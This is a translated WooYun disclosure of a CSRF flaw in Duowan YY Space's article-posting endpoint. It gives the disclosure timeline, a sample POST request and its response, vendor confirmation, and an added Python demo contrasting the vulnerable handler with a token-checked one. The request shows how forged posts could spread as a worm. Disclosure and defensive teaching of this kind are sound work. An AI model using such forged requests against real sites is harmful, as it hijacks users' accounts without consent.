WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2013-09-16: Details submitted to the vendor, awaiting vendor handling
2013-09-18: Vendor has confirmed; details disclosed to the vendor only
2013-09-28: Details disclosed to core white hats and relevant domain experts
2013-10-08: Details disclosed to regular white hats
2013-10-18: Details disclosed to intern white hats
2013-10-31: Details disclosed to the public
A feature in Duowan YY Space does not validate the token, which makes a worm possible.
POST data:
articleTitle=fuck!&articleContent=tester~
POST /feed/issueArticle.do HTTP/1.1
Host: z.yy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Response body:
<li jd="feedId:137932685164651385"> <div class="mod-cont mod-txt"> <div class="hd"> <div class="user-info"> <span class="user-name" jd="uid:811796690"><a href="myzone.do?puid=f4ab7173d7104d15deffaba475589280">y0umer</a></span> </div> <h3> fuck! </h3> </div> <div class="bd"> <div class="cont"> <p> testers~</p> </div> </div> <div class="ft"> <div class="feeds-attr"> <ul class="attr-opt"> <li class="last"><a href="#" jd="e:like,pun" title="喜欢"><i class="ico-like"></i><span>0</span></a></li> <li class="divider"></li> <li><a href="#" jd="e:forward,pun" title="转发"><i class="ico-send"></i><span>0</span></a></li> <li class="divider"></li> <li><a href="#" jd="e:comment,pun" title="评论"><i class="ico-comment"></i><span>0</span></a></li> </ul> <ul class="attr-info"> <li>2秒前</li> </ul> </div> </div> </div> <i class="ico-arr"></i> <i class="user-pic" jd="uid:811796690"><a href="myzone.do?puid=f4ab7173d7104d15deffaba475589280"><img src="../../../images/female_default_32.png" alt=""></a></i> <div class="ico-opt hide"> <ul class="feed-opt"> <li><a jd="e:delete" href="#">删除</a></li> </ul></div> </li>
On inspection, z.yy.com has no CSRF defenses anywhere on the site: the feed-posting endpoint accepts a POST that carries only the victim's session cookie, with no per-session token.
Token.. a rank of 10 isn't unreasonable, is it?
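The report's point is that /feed/issueArticle.do trusts the session cookie alone, so any page the logged-in user visits can submit the form on their behalf. The following is an added example (not code from the report or from YY/Duowan) that models that handler as a plain Python function, shows the vulnerable version next to a hardened one using the synchronizer-token pattern plus an Origin/Referer check, and runs a legitimate and a forged submission through both. The session store, the SITE_ORIGIN value, the _token field name, the uid and the request dicts are all constructed for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed stand-in for the server's session store: session id -> session data.
SESSIONS = {}

# Assumption: the origin the application serves from (taken from the Host header in the report).
SITE_ORIGIN = "https://z.yy.com"


def new_session(uid):
    """Create a logged-in session and mint a random CSRF token bound to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"uid": uid, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server would embed in its own forms for this session."""
    return SESSIONS[sid]["csrf"]


def same_origin(url, expected):
    """Compare scheme, host and port of two URLs (Origin or Referer vs. the site)."""
    p, e = urlparse(url), urlparse(expected)
    return (p.scheme, p.hostname, p.port) == (e.scheme, e.hostname, e.port)


def issue_article_vulnerable(request):
    """Behaviour the report describes: the session cookie alone authorises the post."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401, "not logged in"
    return 200, "posted by uid %d: %s" % (sess["uid"], request["form"]["articleTitle"])


def issue_article_hardened(request):
    """Same handler with two independent CSRF checks in front of the state change."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401, "not logged in"
    # Check 1: browsers attach Origin (or at least Referer) to cross-site form POSTs;
    # reject when it is absent or does not match our own origin.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source is None or not same_origin(source, SITE_ORIGIN):
        return 403, "cross-site request rejected"
    # Check 2: the form must carry the token bound to this session; a page on another
    # origin cannot read it, so it cannot forge it. Constant-time compare.
    submitted = request["form"].get("_token", "")
    if not hmac.compare_digest(submitted, sess["csrf"]):
        return 403, "missing or invalid CSRF token"
    return 200, "posted by uid %d: %s" % (sess["uid"], request["form"]["articleTitle"])


def demo():
    """Run one legitimate and two forged submissions through both handlers.

    Returns the HTTP status each handler produced for each request.
    """
    sid = new_session(12345)  # constructed uid
    cookie = {"sid": sid}
    # Legitimate submission from the site's own page: correct origin and token.
    legit = {"cookies": cookie,
             "headers": {"Origin": SITE_ORIGIN},
             "form": {"articleTitle": "hello", "articleContent": "x",
                      "_token": csrf_token_for(sid)}}
    # Constructed cross-site auto-submitted form: cookie rides along, token absent.
    forged = {"cookies": cookie,
              "headers": {"Origin": "https://third-party.example"},
              "form": {"articleTitle": "hello", "articleContent": "x"}}
    # Same-origin request that still lacks the token (e.g. an old cached form).
    no_token = {"cookies": cookie,
                "headers": {"Referer": SITE_ORIGIN + "/myzone.do"},
                "form": {"articleTitle": "hello", "articleContent": "x"}}
    return {
        "vuln_legit": issue_article_vulnerable(legit)[0],
        "vuln_forged": issue_article_vulnerable(forged)[0],
        "hard_legit": issue_article_hardened(legit)[0],
        "hard_forged": issue_article_hardened(forged)[0],
        "hard_no_token": issue_article_hardened(no_token)[0],
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(name, status)
```

Both checks are deliberately independent: the Origin/Referer check costs nothing and blocks the common case, while the per-session token is what a fix for this report actually needs, since every state-changing form on the site has to carry it and the server has to reject its absence rather than ignore it.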
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2013-09-18 11:30
Thank you for supporting Huanju Times' security work; we will fix it as soon as possible!
None yet